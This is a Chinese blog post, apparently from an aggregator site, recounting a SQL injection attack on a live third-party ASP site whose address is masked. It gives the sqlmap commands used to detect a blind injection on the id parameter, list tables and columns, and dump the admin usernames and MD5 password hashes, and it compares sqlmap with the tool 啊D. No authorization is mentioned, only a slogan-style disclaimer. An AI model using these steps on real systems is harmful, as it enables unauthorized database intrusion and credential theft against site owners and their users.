简单sql注入实战
2017-12-09 23:06
134 查看
sqlmap相关
写在前面:对于某网http://www.xxxx.com/xxxxx.asp?id=11,我采取了sqlmap和啊D两个工具一起来进行sql注入。当然是只作为学习sqlmap和总结语句用,仅供参考,我们要富强、民主、文明、和谐,自由、平等、公正、法治,爱国、敬业、诚信、友善啊D
Sqlmap:
检查注入点是否存在:
sqlmap.py -u "http://www.xxxxx.com/xxxxx.asp?id=11"
可得存在boolean-based blind注入,注入参数id为GET注入,web服务器系统为windows2003 or xp,web应用程序技术为ASP.NET, Microsoft IIS 6.0,数据库类型为Microsoft Access
爆库,发现没有,接下来直接爆表
sqlmap.py -u "http://www.xxxx.com/xxxxx.asp?id=11" —tables
选择user表来爆字段
sqlmap.py -u "http://www.xxxx.com/xxxx.asp?id=11" -T user --columns
选择id,name和passwords来爆内容
sqlmap.py -u "http://www.xxxxxx.com/xxxx.asp?id=11" -T admin -C "id,name,pass" --dump
得到用户名和密码(MD5加密)
对比起来,啊D比sqlmap方便快捷,而且由于字典不同sqlmap在爆字段的时候并没有爆出passwords的字段,但是啊D爆出了,最后爆字段内容的时候,sqlmap比啊D速度快,啊D爆字段内容会卡住....试了好几次才完全爆出来
相关文章推荐
- 一个简单的SQL注入
- 实验吧简单的sql注入--三题答案一样--_--
- 参数化提交SQL语句和拼接SQL语句安全性分析 SQL注入 简单对比分析
- Node.js实战 建立简单的Web服务器
- SmartPhone 2003 手机编程实战之一:简单上手
- 【攻防实战】SQL注入演练!
- 机器学习实战及Python实现——奇异值分解(SVD)实现简单推荐系统
- Unity实战笔记_5.简单的UI框架RescorceManager
- Retrofit实战(一)一个简单的示例
- 【转】之简单分析什么是SQL注入漏洞
- R语言实战前四章学习小结-支付宝账单的简单作图
- 一个关于SQL注入的简单例子
- Jetty实战之 嵌入式运行Jetty实现简单文件服务器
- python简单实战项目:《冰与火之歌1-5》角色关系图谱构建
- [TensorFlow实战] 简单CNN
- 实战演示黑客如何利用SQL注入漏洞攻破一个WordPress网站
- PHP简单实现防止SQL注入的方法
- 策略+简单工厂 实战篇
- [置顶] 【python keras实战】快速开始:训练一个简单的Keras 模型
- Spring Boot实战之Filter实现简单的Http Basic认证